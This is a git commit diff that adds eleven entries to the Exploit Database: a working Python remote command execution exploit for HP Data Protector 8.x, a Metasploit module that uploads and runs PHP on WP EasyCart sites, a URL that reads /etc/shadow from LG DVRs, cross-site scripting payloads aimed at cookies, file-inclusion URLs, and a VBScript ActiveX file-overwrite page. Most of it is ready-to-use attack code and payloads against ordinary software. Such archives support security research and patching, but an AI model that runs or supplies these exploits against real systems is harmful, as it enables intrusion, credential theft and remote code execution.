Update: 2015-02-12

11 new exploits
This commit is contained in:
Offensive Security 2015-02-12 08:36:52 +00:00
parent 4e0a333e52
commit cdf0a2fade
12 changed files with 365 additions and 1 deletions

View file

@ -32467,7 +32467,6 @@ id,file,description,date,author,platform,type,port
36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow PoC",2015-02-09,"Samandeep Singh",windows,dos,0
36023,platforms/php/webapps/36023.txt,"Redaxscript CMS 2.2.0 - SQL Injection Vulnerability",2015-02-09,"ITAS Team",php,webapps,0
36024,platforms/linux/dos/36024.txt,"Chemtool 1.6.14 - Memory Corruption Vulnerability",2015-02-08,"Pablo González",linux,dos,0
36025,platforms/php/webapps/36025.txt,"u5CMS 3.9.3 - Multiple Open Redirect Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
36026,platforms/php/webapps/36026.txt,"u5CMS 3.9.3 - (deletefile.php) Arbitrary File Deletion Vulnerability",2015-02-09,LiquidWorm,php,webapps,0
36027,platforms/php/webapps/36027.txt,"u5CMS 3.9.3 - Multiple SQL Injection Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - (thumb.php) Local File Inclusion Vulnerability",2015-02-09,LiquidWorm,php,webapps,0
@ -32483,3 +32482,13 @@ id,file,description,date,author,platform,type,port
36039,platforms/php/webapps/36039.txt,"Wordpress Theme Divi Arbitrary File Download Vulnerability",2015-02-09,"pool and Fran_73",php,webapps,0
36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80
36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80
36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure Vulnerability",2015-02-10,"Yakir Wizman",hardware,webapps,0
36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80
36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0
36045,platforms/cgi/remote/36045.txt,"SurgeFTP 23b6 Multiple Cross Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote,0
36046,platforms/php/webapps/36046.txt,"phpWebSite 'page_id' Parameter Cross Site Scripting Vulnerability",2011-08-17,Ehsan_Hp200,php,webapps,0
36047,platforms/php/webapps/36047.txt,"awiki 20100125 Multiple Local File Include Vulnerabilities",2011-08-15,muuratsalo,php,webapps,0
36048,platforms/php/webapps/36048.txt,"PHPList 2.10.x Security Bypass and Information Disclosure Vulnerabilities",2011-08-15,"Davide Canali",php,webapps,0
36049,platforms/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2011-08-17,"High-Tech Bridge SA",windows,remote,0
36050,platforms/php/webapps/36050.txt,"WordPress Fast Secure Contact Form 3.0.3.1 'index.php' Cross Site Scripting Vulnerability",2011-08-17,"High-Tech Bridge SA",php,webapps,0
36051,platforms/php/webapps/36051.txt,"WordPress WP-Stats-Dashboard Plugin 2.6.5.1 Multiple Cross Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0

Can't render this file because it is too large.

15
platforms/cgi/remote/36045.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/49160/info
SurgeFTP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
SurgeFTP 23b6 is vulnerable; other versions may also be affected.
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&fname="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&last="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&class_name="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=report_file&domainid=0&filter="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=user_admin&domainid="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid="<script>alert('XSS');</script>

View file

@ -0,0 +1,27 @@
----------------------------------------------------------------------
Title : LG DVR LE6016D - Remote File Disclosure Vulnerability (0day)
CVE-ID : none
Product : LG
Affected : All versions
Impact : Critical
Remote : Yes
Product link: http://www.lgecommercial.com/security-en/products/analog-product/analog-dvr/lg-LE6016D
Reported : 10/02/2015
Author : Yakir Wizman, yakir.wizman@gmail.com
Vulnerability description:
----------------------------------------------------------------------
No authentication (login) is required to exploit this vulnerability.
The LG DVR application is prone to a remote file disclosure vulnerability.
An attacker can exploit this vulnerability to retrieve stored files on server such as '/etc/passwd' and '/etc/shadow' by using a simple url request which made by browser.
More over, an attacker may be able to compromise encrypted login credentials for or retrieve the device's administrator password allowing them to directly access the device's configuration control panel.
Proof of concept:
----------------------------------------------------------------------
The following simple url request will retrieve '/etc/shadow' file:
http://127.0.0.1:1234/etc/shadow
~eof.

69
platforms/hp-ux/remote/35961.py Executable file
View file

@ -0,0 +1,69 @@
#!/usr/bin/python
# Exploit Title: HP-Data-Protector-8.x Remote command execution.
# Google Dork: -
# Date: 30/01/2015
# Exploit Author: Juttikhun Khamchaiyaphum
# Vendor Homepage: https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818
# Software Link: http://www8.hp.com/th/en/software-solutions/data-protector-backup-recovery-software/
# Version: 8.x
# Tested on: IA64 HP Server Rx3600
# CVE : CVE-2014-2623
# Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. "uname -m">"
import socket
import struct
import sys
def exploit(host, port, command):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
print "[+] Target connected."
OFFSET_DEC_START = 133
OFFSET_DEC = (OFFSET_DEC_START + len(command))
# print "OFFSET_DEC_START:" + str(OFFSET_DEC_START)
# print "len(command)" + str(len(command))
# print "OFFSET_DEC" + str(OFFSET_DEC)
OFFSET_HEX = "%x" % OFFSET_DEC
# print "OFFSET_HEX" + str(OFFSET_HEX)
OFFSET_USE = chr(OFFSET_DEC)
# print "Command Length: " + str(len(command))
PACKET_DATA = "\x00\x00\x00"+\
OFFSET_USE+\
"\x20\x32\x00\x20\x73\x73\x73\x73\x73\x73\x00\x20\x30" + \
"\x00\x20\x54\x45\x53\x54\x45\x52\x00\x20\x74\x65\x73\x74\x65\x72\x00" + \
"\x20\x43\x00\x20\x32\x30\x00\x20\x74\x65\x73\x65\x72\x74\x65\x73\x74" + \
"\x2E\x65\x78\x65\x00\x20\x72\x65\x73\x65\x61\x72\x63\x68\x00\x20\x2F" + \
"\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75" + \
"\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x30\x00" + \
"\x20\x32\x00\x20\x75\x74\x69\x6C\x6E\x73\x2F\x64\x65\x74\x61\x63\x68" + \
"\x00\x20\x2D\x64\x69\x72\x20\x2F\x62\x69\x6E\x20\x2D\x63\x6F\x6D\x20" + \
" %s\x00" %command
# Send payload to target
print "[+] Sending PACKET_DATA"
sock.sendall(PACKET_DATA)
# Parse the response back
print "[*] Result:"
while True:
response = sock.recv(2048)
if not response: break
print response
except Exception as ex:
print >> sys.stderr, "[-] Socket error: \n\t%s" % ex
exit(-3)
sock.close()
if __name__ == "__main__":
try:
target = sys.argv[1]
port = int(sys.argv[2])
command = sys.argv[3]
exploit(target, port, command)
except IndexError:
print("Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. \"uname -m\">")
exit(0)

171
platforms/php/webapps/36043.rb Executable file
View file

@ -0,0 +1,171 @@
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress WP EasyCart Unrestricted File Upload',
'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for
WordPress contains a flaw that allows a remote
attacker to execute arbitrary PHP code. This
flaw exists because the
/inc/amfphp/administration/banneruploaderscript.php
script does not properly verify or sanitize
user-uploaded files. By uploading a .php file,
the remote system will place the file in a
user-accessible path. Making a direct request to
the uploaded file will allow the attacker to
execute the script with the privileges of the web
server.
In versions <= 3.0.8 authentication can be done by
using the WordPress credentials of a user with any
role. In later versions, a valid EasyCart admin
password will be required that is in use by any
admin user. A default installation of EasyCart will
setup a user called "demouser" with a preset password
of "demouser".},
'License' => MSF_LICENSE,
'Author' =>
[
'Kacper Szurek', # Vulnerability disclosure
'Rob Carr <rob[at]rastating.com>' # Metasploit module
],
'References' =>
[
['OSVDB', '116806'],
['WPVDB', '7745']
],
'DisclosureDate' => 'Jan 08 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['wp-easycart', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [false, 'The WordPress username to authenticate with (versions <= 3.0.8)']),
OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with (versions <= 3.0.8)']),
OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.18)', 'demouser']),
OptBool.new('EC_PASSWORD_IS_HASH', [false, 'Indicates whether or not EC_PASSWORD is an MD5 hash', false])
], self.class)
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def ec_password
datastore['EC_PASSWORD']
end
def ec_password_is_hash
datastore['EC_PASSWORD_IS_HASH']
end
def use_wordpress_authentication
username.to_s != '' && password.to_s != ''
end
def use_ec_authentication
ec_password.to_s != ''
end
def req_id
if ec_password_is_hash
return ec_password
else
return Rex::Text.md5(ec_password)
end
end
def generate_mime_message(payload, date_hash, name, include_req_id)
data = Rex::MIME::Message.new
data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"")
data.add_part(req_id, nil, nil, 'form-data; name="reqID"') if include_req_id
data
end
def setup
if !use_wordpress_authentication && !use_ec_authentication
fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value')
end
super
end
def exploit
vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication
vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication
if use_wordpress_authentication && use_ec_authentication
print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...")
end
if use_wordpress_authentication
print_status("#{peer} - Authenticating using #{username}:#{password}...")
cookie = wordpress_login(username, password)
if !cookie
if use_ec_authentication
print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...")
else
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')
end
else
print_good("#{peer} - Authenticated with WordPress")
end
end
print_status("#{peer} - Preparing payload...")
payload_name = Rex::Text.rand_text_alpha(10)
date_hash = Rex::Text.md5(Time.now.to_s)
uploaded_filename = "#{payload_name}_#{date_hash}.php"
plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication)
print_status("#{peer} - Uploading payload to #{payload_url}")
res = send_request_cgi(
'method' => 'POST',
'uri' => uploader_url,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookie
)
fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
print_status("#{peer} - Executing the payload...")
register_files_for_cleanup(uploaded_filename)
res = send_request_cgi(
{
'uri' => payload_url,
'method' => 'GET'
}, 5)
if !res.nil? && res.code == 404
print_error("#{peer} - Failed to upload the payload")
else
print_good("#{peer} - Executed payload")
end
end
end

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49138/info
PHP Flat File Guestbook is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/[path]/ffgb_admin.php?book_id=http://shell?

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49176/info
phpWebSite is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/mod.php?mod=userpage&page_id=[XSS]

10
platforms/php/webapps/36047.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/49187/info
awiki is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
awiki 20100125 is vulnerable; other versions may also be affected.
http://www.example.com/awiki/index.php?page=/etc/passwd
http://www.example.com/awiki/index.php?action=Editar+el+Motor&scriptname=/etc/passwd

View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/49188/info
PHPList is prone to a security-bypass vulnerability and an information-disclosure vulnerability.
An attacker can exploit these issues to gain access to sensitive information and send arbitrary messages to registered users. Other attacks are also possible.
http://www.example.com/lists/?p=forward&uid=VALID_UID&mid=ID
http://www.example.com/lists/?p=forward&uid=foo&mid=ID

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49193/info
The Fast Secure Contact Form plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to Fast Secure Contact Form 3.0.3.2 are vulnerable.
http://www.example.com/wp-content/plugins/si-contact-form/captcha/test/index.php/%22%3E%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E

23
platforms/php/webapps/36051.txt Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/49197/info
WP-Stats-Dashboard is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
WP-Stats-Dashboard 2.6.5.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?icon=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?url=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=200&username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/select-trend.php?onchange=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/submenu.php?submenu[%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49192/info
StudioLine Photo Basic ActiveX is prone to an arbitrary-file-overwrite vulnerability.
Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).
StudioLine Photo Basic 3.70.34.0 is vulnerable; other versions may also be affected.
<html> <object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\File_name_to_corrupt_or_create" arg2=True target.EnableLog arg1 ,arg2 End Sub </script> </html>